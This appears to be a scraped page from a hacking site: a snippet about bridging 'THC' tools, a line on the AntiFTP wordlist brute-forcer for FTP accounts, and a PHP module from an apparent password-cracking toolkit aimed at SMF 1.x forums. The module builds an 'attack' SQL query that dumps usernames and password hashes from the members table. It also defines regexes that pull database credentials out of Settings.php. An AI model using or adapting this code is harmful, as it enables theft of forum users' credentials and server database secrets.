..how to make a multi bridge between THC_DO, THC_SS and THC_II and keep track of the output in realtime using iframes. So what exactly are we going to do? First of all if you don't know..
AntiFTP uses wordlists in order to bruteforce FTP user accounts
<?php
/* SMF 1.x */
$_PROPERTIES = array();
$_PROPERTIES['name'] = "SMF1";
$_PROPERTIES['version'] = "1.x";
$_PROPERTIES['usernamefield'] = "memberName";
$_PROPERTIES['emailfield'] = "emailAddress";
$_PROPERTIES['hashfield'] = "passwd";
$_PROPERTIES['tablename'] = "members";
$_PROPERTIES['tableprefix'] = "smf_";
$_PROPERTIES['filename'] = "smf/smfa.php";
// use post variables instead if values are different from default
if(isset($_POST['iUseDefault']) && $_POST['iUseDefault']==0){
$_PROPERTIES['usernamefield'] = @mysql_real_escape_string($_POST['sUserNameField']);
$_PROPERTIES['emailfield'] = @mysql_real_escape_string($_POST['sEmailField']);
$_PROPERTIES['hashfield'] = @mysql_real_escape_string($_POST['sHashField']);
$_PROPERTIES['tablename'] = @mysql_real_escape_string($_POST['sTableName']);
$_PROPERTIES['tableprefix'] = @mysql_real_escape_string($_POST['sTablePrefix']);
}
$_PROPERTIES['queryraw'] = array();
$_PROPERTIES['queryraw']['attack'] = "SELECT ".$_PROPERTIES['usernamefield']." AS crackuser,".$_PROPERTIES['hashfield']." AS crackpass FROM ".$_PROPERTIES['tableprefix'].$_PROPERTIES['tablename'];
$_PROPERTIES['queryraw']['getemail'] = "SELECT ".$_PROPERTIES['emailfield']." AS temail FROM ".$_PROPERTIES['tableprefix'].$_PROPERTIES['tablename']." WHERE ".$_PROPERTIES['usernamefield']."='/user/'";
if(isset($_GET['JSON'])){
session_cache_limiter('nocache');
header('Expires: '.gmdate('r',0));
header('Content-type: application/json');
echo json_encode($_PROPERTIES);
}
$_SYSTEM = array();
$_SYSTEM['name'] = $_PROPERTIES['name'];
$_SYSTEM['version'] = $_PROPERTIES['version'];
$_SYSTEM['patterns'] = array();
$_SYSTEM['patterns']['user'] = '/\$db_user\s+=\s+\'(.*)?\'/';
$_SYSTEM['patterns']['password'] = '/\$db_passwd\s+=\s+\'(.*)?\'/';
$_SYSTEM['patterns']['host'] = '/\$db_server\s+=\s+\'(.*)?\'/';
$_SYSTEM['patterns']['database'] = '/\$db_name\s+=\s+\'(.*)?\'/';
$_SYSTEM['file'] = "Settings.php";
?>